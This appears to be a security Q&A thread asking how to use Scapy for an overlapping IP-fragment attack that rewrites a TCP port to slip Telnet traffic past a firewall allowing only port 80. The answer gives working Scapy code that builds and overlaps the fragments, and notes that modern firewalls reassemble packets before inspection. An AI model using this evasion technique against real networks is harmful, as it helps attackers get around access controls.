# The overlapping fragment attack using Scapy

Tags: penetration-test

How to use [Scapy](http://www.secdev.org/projects/scapy/) to overwrite a part of the TCP header information of the first fragment, which contained data that was allowed to pass through the firewall, with malicious data in subsequent fragments?

For example: overwrite the destination port number to change the type of service i.e. change from port 80 (HTTP) to port 23 (Telnet) which would not be allowed to pass the router in normal circumstances.

I want to overwrite the destination port in order to connect to the new port number. And I'm trying to bypass Firewall restrictions on remote web server which allows only web traffic on 80 port.

I've used this sample code, but I don't get a response from the target machine:

```
dstIP=’10.0.2.17’

frag1=IP(dst=dstIP, id=12345, proto=1, frag=0, flags=1)/TCP(dport=80)/ICMP(type=8,
code=0, chksum=0xdce8)

frag2=IP(dst=dstIP, id=12345, proto=1, frag=2, flags=1)/TCP(dport=23)/”ABABABAB”

frag3=IP(dst=dstIP, id=12345, proto=1, frag=1,flags=0)/TCP(dport=23)/”AAAAAAAABABABABACCCCCCCC”

send(frag1)
send(frag2)
send(frag3)
```

Comment: Not sure that I can envision what you hope to do here. You want to overwrite data after it has passed through the firewall? If you change dest port numbers part way through a fragment, are you hoping to connect to the 'new' port number?

Comment: If you are hoping to craft a packet to pass through a firewall on port 80, but connect to a telnet server on the outside, why not just setup the telnet server on port 80?

Comment: A reason could be that the OS you are sending packets to are stateful. It will match if the src ip, src port and dst ip and dst port are the same. I can imagine the stateful engine on the OS will be very confused about which application to send packets to. It would be a neat trick if it worked, but I have a hard time understanding why you send SMB-data over telnet, masqueraded as http...

Answer (score 1):

Create a fake `IP` header hinting `proto=tcp`. Note that you cannot modify IP header fields with a fragment overlap as we are talking about IP payload fragmentation. Set the `MF` More Fragments flag and indicate that this is the first fragment by setting the offset to 0 `frag=0`. Create another IP packet with the same `IP.id, IP.src, IP.dst, IP.proto` with the `MF` flag not being set (last fragment does not have `MF` bit set). This packet is going to overlap IP payload at a specific offset therefore set the fragment offset `frag=x` where the actual position in your payload is `x*8` i.e. `offset=1` is the position of `byte 8` (this would be the TCP checksum).

Here's a simple example:

```
# create two IP packets, one with 1480 payload bytes and one with 4 payload bytes
# initial payload is TCP with sport/dport being 9999

frags = fragment(IP(dst=dstIP)/TCP(sport=9999,dport=9999)/("FAKE"*(1464//4)))

# [<IP  flags=MF frag=0 proto=tcp dst=10.0.2.17 |<Raw  load="'\x0f'\x0f\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\xd5n\x00\x00FAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKE" |>>, <IP  flags= frag=185 proto=tcp dst=10.0.2.17 |<Raw  load='FAKE' |>>]
# overwrite the 4 payload bytes of fragment 2 to overlap the reassembled IP packet at offset 0 to overwrite sport/dport to port 80,80

frags[1][Raw].load=struct.pack("!HH",80,80)  # network byteorder
frags[1][IP].frag=0
# <IP  flags= frag=0 proto=tcp dst=10.0.2.17 |<Raw  load='\x00P\x00P' |>>

# send your fragments and watch them being reassembled in wireshark/...
# they should show up the initial IP/TCP/sport=dport=9999 packet but with sport/dport being set to 80
send(frags)
```

This will reassemble to:

```
IP(dst=dstIP)/TCP(sport=80,dport=80)/("FAKE"*(1460//4))
```

Note that you still have to fix the TCP checksum and modern firewalls usually employ IP defragmentation and TCP stream reassembly in order to evaluate the actual reassembled packet/segment instead of one of its fragments.